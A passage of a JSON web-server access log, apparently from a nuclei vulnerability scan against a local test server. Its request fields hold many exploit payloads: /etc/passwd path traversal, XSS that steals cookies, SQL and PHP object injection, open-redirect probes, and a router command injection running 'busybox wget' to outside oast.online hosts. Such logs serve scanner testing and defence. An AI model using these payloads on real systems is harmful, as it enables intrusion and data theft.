+0000","request_body":"fldr=&url=file:///etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /filemanager/upload.php HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.999","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@example.com%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.216","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis2/axis2-web/HappyAxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.prod.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"{\x22username\x22:\x22nuclei_297MbAHoI5K5Oalw9I4aqY4rMXF\x22,\x22password\x22:\x22297MbGOZfFTVtVb39uopjnFMRwP\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/user/signup/step2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dotAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/index.php/home/file/user_pics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@example.com%5C@WillBeReplaced.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensis/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.production.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.225","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nbproject/project.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url=http://127.0.0.1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws/v1/cluster/apps/new-application HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1.24/version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.205","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"username=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&password=AAA%22%3Bs%3A11%3A%22maonnalezzo%22%3BO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A7%3A%22print_r%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A40%3A%22http%3A%2F%2Frusty.jooml%2F%3Bpkwxhxqxmdkkmscotwvh%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7Ds%3A6%3A%22return%22%3Bs%3A102%3A&option=com_users&task=user.login&{{csrf}}=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.214","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nagios/cgi-bin/status.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/custom.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /client/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://example.com/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /final/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pandora_console/mobile/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.219","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.207","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /////%5C;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /files/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"USERNAME=student&PASSWORD=student@123&language=en&log=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CMSPages/logon.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web_caps/webCapsConfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.195","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://example.com/https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../..//etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /icons/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /TransferredOutModal.php?modfunc=detail HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://www.%5C.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wget http://c9v8hs0smpv8c6ag07h0hrj1awt53poow.oast.online`;busybox wget http://c9v8hs0smpv8c6ag07h0ny9tufhrsh7mm.oast.online&ipv=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /GponForm/diag_Form?images/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /centreon/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 